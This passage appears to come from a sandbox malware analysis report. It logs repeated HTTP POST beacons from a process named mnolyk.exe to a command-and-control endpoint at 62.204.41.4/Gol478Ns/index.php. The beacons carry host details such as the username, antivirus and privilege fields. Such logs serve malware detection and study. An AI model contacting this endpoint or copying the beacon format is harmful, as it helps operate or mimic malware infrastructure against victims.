                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.337419033 CET343INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      229192.168.2.74992462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:03.524087906 CET344OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.586734056 CET344INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      23192.168.2.74971762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:07.153402090 CET127OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.215212107 CET127INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      230192.168.2.74992562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:03.782316923 CET345OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:03.847449064 CET345INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      231192.168.2.74992662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:04.026093006 CET346OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.093128920 CET346INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      232192.168.2.74992762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:04.272109985 CET347OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.337214947 CET347INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      233192.168.2.74992862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:04.507544041 CET348OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.572125912 CET348INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      234192.168.2.74992962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:04.773416042 CET349OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:04.839795113 CET349INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      235192.168.2.74993062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:05.022670984 CET350OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.087532997 CET350INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      236192.168.2.74993162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:05.263417006 CET351OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.328085899 CET351INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      237192.168.2.74993262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:05.505650043 CET352OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.569046974 CET352INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      238192.168.2.74993362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:05.759793043 CET353OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:05.823514938 CET353INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:05 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      239192.168.2.74993462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:05.990362883 CET354OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.055263042 CET354INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      24192.168.2.74971862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:07:07.389631987 CET128OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:07.452438116 CET128INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      240192.168.2.74993562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:06.241909981 CET355OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.306998014 CET355INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      241192.168.2.74993662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:06.480597973 CET356OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.544333935 CET356INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      242192.168.2.74993762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:06.728827000 CET357OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:06.790683985 CET357INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      243192.168.2.74993862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:06.973603964 CET358OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.040034056 CET358INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      244192.168.2.74993962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:07.214342117 CET359OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.278188944 CET359INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:08:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      245192.168.2.74994062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 7, 2023 23:08:07.464493990 CET360OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:08:07.529371977 CET360INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
